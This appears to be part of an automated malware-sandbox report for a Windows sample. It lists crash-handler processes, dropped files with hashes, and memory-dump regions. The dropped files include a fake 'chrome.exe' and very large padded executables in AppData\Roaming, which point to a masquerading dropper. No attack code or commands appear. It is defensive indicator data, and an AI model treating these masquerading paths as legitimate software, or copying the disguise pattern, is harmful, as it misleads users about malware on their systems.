-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3308 -ip 33081⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 1484 -ip 14841⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3308 -s 9361⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1484 -s 3521⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1484 -s 3521⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3308 -s 9361⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER91FA.tmp.csvFilesize
40KB
MD56b07ee972ebdc98c44d3e1965f2ffa49
SHA1ebc1669edb2f015baba53179d99b6da55c888687
SHA256f84037ed8001e4385fb6a32b66adf234aed219854ac2c972ed43b59b5f62d9a1
SHA5124292cdd27d35afc6ea813873e3f0ad71d2cc381532a74587e0eed6d1cd04346f388f5995820c242ebd39e873efa703309076f170bdaa2c10af2df10c608d1f18
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER91FB.tmp.csvFilesize
40KB
MD546a269e2d5c8e6503cedfb77eab4cab4
SHA1b4ba2f49448f2c23afcbc188f416493e8044f1d2
SHA2566f06baa44e15ff010913cd332ee1600a283ae22634c07ca8dba5c64106354f55
SHA512c2f6ff7b43e86859dcf2d12c138607b9a72cd215e5892ccf4626c72be941e839b00a75fa86991cad6fd1fbb4a284c993ee28342799e7bc2bf384b8d587c5fe82
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C1.tmp.txtFilesize
13KB
MD5a33618cc76d6bd89f8fa377c1b98d483
SHA147a330f34d40bdb6a7e397406e7918bf12be0b74
SHA2561375a574b2e13115eb9d5d3f325861100cc6022e2ad193a73d7e09ff3cd371f3
SHA512a68bd2d37de5db575c5120612cce2ff03f805b45ba54683500f45199a2fc4702875657646136ac356b14c28e617672c952db5cbbdea26c63f417fa20a729eaa9
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C2.tmp.txtFilesize
13KB
MD549a8f78539b17863bc6e78e5364e4dac
SHA137d18edfa90d09491017dc7fbeeaed47949ad52f
SHA2568dc7641b53903d5b00d43ca7239393483fb7bbef3ae7df8a40aeee98f036fa46
SHA5125d8511772e19bba7f34421693311f20871de285273f3e15f525f8482cfe2850c24323bf17ad9bfedbdfa59273a44540280ab753b79ea11b1014989668eeb9fe3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD53e4d57d0f5914187ae1b311f72341c51
SHA14d0db398175c6d2d35774404afb8fd98071d010e
SHA25607fbda60444acc176e8890e957c88bc21ee4abd34603a487745fcaea142bd369
SHA512e618e578f4c1887d52feb022520ab1a4c6f3f200aeb3d3cc721ba151624fd7a60a1185a61620b629569bbcde64cf27958331baf8efd29d691dfad3a215edf1db
-
C:\Users\Admin\AppData\Roaming\Chrome\chrome.exeFilesize
254.9MB
MD56893fc513fff739b36b4521285f9b800
SHA1c7a632a7b30c7839904249d87a380d8aef44d3c0
SHA256edbeedeec9ecb8c19b6ddd93b47968b6b2c3c6ff2a92166bf75f63a3a2749e3f
SHA512b50acc1408a3bae46a6258447874cd1f6049923dd58311a4fed5e2038027a64fd0076078d2358c48bded153c56d7fa24fcead281d7ea6e61af1346b143413b39
-
C:\Users\Admin\AppData\Roaming\Chrome\chrome.exeFilesize
254.3MB
MD52e8a33ed06e1271a98bdd321faf83d15
SHA19228fee5a8fc578720727be08783333eb4442bd3
SHA25615633232144436a7b73bc2ccb8de6e35af9e6c937eca8d8f8784dd5a5aaeeb20
SHA51228bc04e616757e91ec2e710bd674bc06aaf1a067e4197f2ffbbf1d687fbed94e05cc61258f490b123fdb529cf37f8c91f3d8bd2f285e0debee7bb3e1c09bd3a8
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
487.2MB
MD5e0384f56863ff9dade991a2585a6c743
SHA11e224626dabb3543da8b9d23cb390d9a3ad2341b
SHA256af6cbf4108c25de39653bb2f7e0702cb3a9f720c3bdc074ceb784dde204c4009
SHA512ce9bb394e76cd0c543034c821a41c7922917cb12701256a5e4f0b53bbe6814fd1f773f7469ab97090bc44058f88f11bf58358e502bbb2af9790577d605b81edd
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
488.9MB
MD56adb34f3dd9e21a3fa7e8c7ae01d51d4
SHA149d384bc9f55f41a04e709e853de796349d9a1cd
SHA25692769fed01e96f67b08224816f8181cfef7c04852b7cee6d7f1bc837763bec9d
SHA51220d1e32c98a01dae8652362c0b1737f05fb92d0109a037069e8d5c27d091b62f175082bad51f82685f8ad48277d0b5959f14d41b74bab5ad9d5401a9afe5ec7b
-
C:\Users\Admin\AppData\Roaming\ger.exeFilesize
1.9MB
MD5ebc48d85bce66e7534e695c2eb990fc7
SHA1de42ec460cbcee1d8d1629d41d0764eb16799361
SHA25632fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c
SHA512da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8
-
C:\Users\Admin\AppData\Roaming\ger.exeFilesize
1.9MB
MD5ebc48d85bce66e7534e695c2eb990fc7
SHA1de42ec460cbcee1d8d1629d41d0764eb16799361
SHA25632fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c
SHA512da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8
-
memory/60-236-0x000001BC4D510000-0x000001BC4D53A000-memory.dmpFilesize
168KB
-
memory/60-201-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/400-305-0x000001A96D850000-0x000001A96D87A000-memory.dmpFilesize
168KB
-
memory/400-303-0x000001A96D7D0000-0x000001A96D7FA000-memory.dmpFilesize
168KB
-
memory/400-304-0x0000000000000000-mapping.dmp
-
memory/428-249-0x000001A70E580000-0x000001A70E5AA000-memory.dmpFilesize
168KB
-
memory/428-226-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/444-300-0x0000028989FB0000-0x0000028989FDA000-memory.dmpFilesize
168KB
-
memory/444-260-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/460-141-0x0000000000950000-0x0000000000B2D000-memory.dmpFilesize
1.9MB
-
memory/460-133-0x0000000000000000-mapping.dmp
-
memory/540-160-0x0000000000000000-mapping.dmp
-
memory/620-234-0x0000027D01C40000-0x0000027D01C6A000-memory.dmpFilesize
168KB
-
memory/620-200-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/620-231-0x0000027D01C10000-0x0000027D01C33000-memory.dmpFilesize
140KB
-
memory/676-205-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/676-235-0x0000017941310000-0x000001794133A000-memory.dmpFilesize
168KB
-
memory/724-225-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/724-250-0x0000022C56990000-0x0000022C569BA000-memory.dmpFilesize
168KB
-
memory/760-179-0x0000000000000000-mapping.dmp
-
memory/780-164-0x0000000000000000-mapping.dmp
-
memory/960-237-0x0000028990040000-0x000002899006A000-memory.dmpFilesize
168KB
-
memory/960-230-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1028-227-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1028-251-0x0000014FE7500000-0x0000014FE752A000-memory.dmpFilesize
168KB
-
memory/1040-228-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1040-252-0x0000021A803A0000-0x0000021A803CA000-memory.dmpFilesize
168KB
-
memory/1048-152-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmpFilesize
10.8MB
-
memory/1048-151-0x00000266C8360000-0x00000266C8382000-memory.dmpFilesize
136KB
-
memory/1048-149-0x0000000000000000-mapping.dmp
-
memory/1052-275-0x0000000008500000-0x000000000852A000-memory.dmpFilesize
168KB
-
memory/1052-255-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1060-165-0x0000000000000000-mapping.dmp
-
memory/1120-229-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1120-253-0x0000019EB1890000-0x0000019EB18BA000-memory.dmpFilesize
168KB
-
memory/1184-221-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1184-314-0x0000029201580000-0x00000292015AA000-memory.dmpFilesize
168KB
-
memory/1244-315-0x0000020083E00000-0x0000020083E2A000-memory.dmpFilesize
168KB
-
memory/1244-204-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1308-320-0x00000205F8BC0000-0x00000205F8BEA000-memory.dmpFilesize
168KB
-
memory/1308-203-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1360-175-0x0000000000000000-mapping.dmp
-
memory/1364-224-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1388-319-0x000001B4A9330000-0x000001B4A935A000-memory.dmpFilesize
168KB
-
memory/1388-202-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1396-208-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1492-206-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1552-207-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1576-212-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1608-312-0x0000022CC2B70000-0x0000022CC2B9A000-memory.dmpFilesize
168KB
-
memory/1608-261-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1628-211-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1652-209-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1696-210-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1764-219-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1772-289-0x000002207DD40000-0x000002207DD6A000-memory.dmpFilesize
168KB
-
memory/1772-286-0x0000000000000000-mapping.dmp
-
memory/1772-291-0x000002207E150000-0x000002207E17A000-memory.dmpFilesize
168KB
-
memory/1820-166-0x0000000000000000-mapping.dmp
-
memory/1824-214-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1828-223-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1860-218-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1868-217-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1884-195-0x0000000000000000-mapping.dmp
-
memory/1900-216-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/1964-215-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2036-213-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2044-281-0x000001F891A00000-0x000001F891A2A000-memory.dmpFilesize
168KB
-
memory/2112-318-0x0000000000000000-mapping.dmp
-
memory/2128-349-0x0000000000000000-mapping.dmp
-
memory/2132-148-0x0000000000000000-mapping.dmp
-
memory/2176-196-0x0000000000000000-mapping.dmp
-
memory/2176-199-0x00007FFCB62C0000-0x00007FFCB6D81000-memory.dmpFilesize
10.8MB
-
memory/2192-163-0x0000000000000000-mapping.dmp
-
memory/2200-222-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2228-187-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2228-188-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2228-184-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2228-185-0x00000001400024C8-mapping.dmp
-
memory/2228-191-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmpFilesize
760KB
-
memory/2228-194-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2228-193-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2228-186-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2348-220-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2356-368-0x0000000000000000-mapping.dmp
-
memory/2364-232-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2440-233-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2452-192-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmpFilesize
760KB
-
memory/2452-189-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2452-182-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmpFilesize
2.0MB
-
memory/2452-183-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmpFilesize
760KB
-
memory/2452-172-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmpFilesize
10.8MB
-
memory/2488-245-0x0000017C5DDC0000-0x0000017C5DDEA000-memory.dmpFilesize
168KB
-
memory/2488-238-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2500-246-0x000001945F460000-0x000001945F48A000-memory.dmpFilesize
168KB
-
memory/2500-239-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2576-178-0x0000000000000000-mapping.dmp
-
memory/2576-284-0x0000000000000000-mapping.dmp
-
memory/2576-294-0x000002154E8E0000-0x000002154E90A000-memory.dmpFilesize
168KB
-
memory/2604-240-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2604-247-0x000001AC65270000-0x000001AC6529A000-memory.dmpFilesize
168KB
-
memory/2616-248-0x000002BB8A780000-0x000002BB8A7AA000-memory.dmpFilesize
168KB
-
memory/2616-241-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2624-282-0x000002A98DDE0000-0x000002A98DE0A000-memory.dmpFilesize
168KB
-
memory/2624-181-0x0000000000000000-mapping.dmp
-
memory/2664-242-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2696-243-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2720-244-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2728-254-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/2728-274-0x00000262EEB70000-0x00000262EEB9A000-memory.dmpFilesize
168KB
-
memory/2872-170-0x0000000004740000-0x0000000004D68000-memory.dmpFilesize
6.2MB
-
memory/2872-180-0x0000000005650000-0x000000000566E000-memory.dmpFilesize
120KB
-
memory/2872-176-0x0000000004EE0000-0x0000000004F46000-memory.dmpFilesize
408KB
-
memory/2872-169-0x0000000004020000-0x0000000004056000-memory.dmpFilesize
216KB
-
memory/2872-174-0x0000000004600000-0x0000000004622000-memory.dmpFilesize
136KB
-
memory/2872-321-0x0000000007E50000-0x00000000084CA000-memory.dmpFilesize
6.5MB
-
memory/3112-283-0x000001A24A540000-0x000001A24A56A000-memory.dmpFilesize
168KB
-
memory/3112-256-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/3476-257-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/3476-285-0x000001F6F4280000-0x000001F6F42AA000-memory.dmpFilesize
168KB
-
memory/3516-311-0x0000015742E50000-0x0000015742E7A000-memory.dmpFilesize
168KB
-
memory/3744-287-0x000001CFD7A60000-0x000001CFD7A8A000-memory.dmpFilesize
168KB
-
memory/3744-258-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/3832-345-0x0000000000000000-mapping.dmp
-
memory/3968-293-0x0000000000000000-mapping.dmp
-
memory/3968-298-0x00000228D5B90000-0x00000228D5BBA000-memory.dmpFilesize
168KB
-
memory/4016-259-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/4016-299-0x000001BAA0700000-0x000001BAA072A000-memory.dmpFilesize
168KB
-
memory/4220-279-0x000001D0D9FF0000-0x000001D0DA01A000-memory.dmpFilesize
168KB
-
memory/4220-153-0x0000000000000000-mapping.dmp
-
memory/4260-167-0x0000000000000000-mapping.dmp
-
memory/4284-173-0x0000000000000000-mapping.dmp
-
memory/4292-155-0x0000000000000000-mapping.dmp
-
memory/4444-158-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-156-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-161-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-159-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/4444-157-0x0000000140002348-mapping.dmp
-
memory/4448-171-0x0000000000000000-mapping.dmp
-
memory/4744-262-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/4744-313-0x0000020091480000-0x00000200914AA000-memory.dmpFilesize
168KB
-
memory/4812-135-0x0000000000030000-0x0000000000278000-memory.dmpFilesize
2.3MB
-
memory/4812-140-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmpFilesize
10.8MB
-
memory/4812-130-0x0000000000000000-mapping.dmp
-
memory/4812-154-0x000000001D2F0000-0x000000001D302000-memory.dmpFilesize
72KB
-
memory/4852-150-0x00000000058A0000-0x0000000005906000-memory.dmpFilesize
408KB
-
memory/4852-177-0x0000000006480000-0x0000000006512000-memory.dmpFilesize
584KB
-
memory/4852-162-0x00000000069F0000-0x0000000006F94000-memory.dmpFilesize
5.6MB
-
memory/4852-143-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/4852-142-0x0000000000000000-mapping.dmp
-
memory/4892-317-0x000002056A8B0000-0x000002056A8DA000-memory.dmpFilesize
168KB
-
memory/4892-302-0x0000000000000000-mapping.dmp
-
memory/5072-307-0x0000000000000000-mapping.dmp
-
memory/5072-309-0x00000297E4930000-0x00000297E495A000-memory.dmpFilesize
168KB
-
memory/5072-308-0x00000297E4900000-0x00000297E492A000-memory.dmpFilesize
168KB
-
memory/5096-168-0x0000000000000000-mapping.dmp
-
memory/5112-296-0x00000157BE4A0000-0x00000157BE4CA000-memory.dmpFilesize
168KB
-
memory/5112-292-0x0000000000000000-mapping.dmp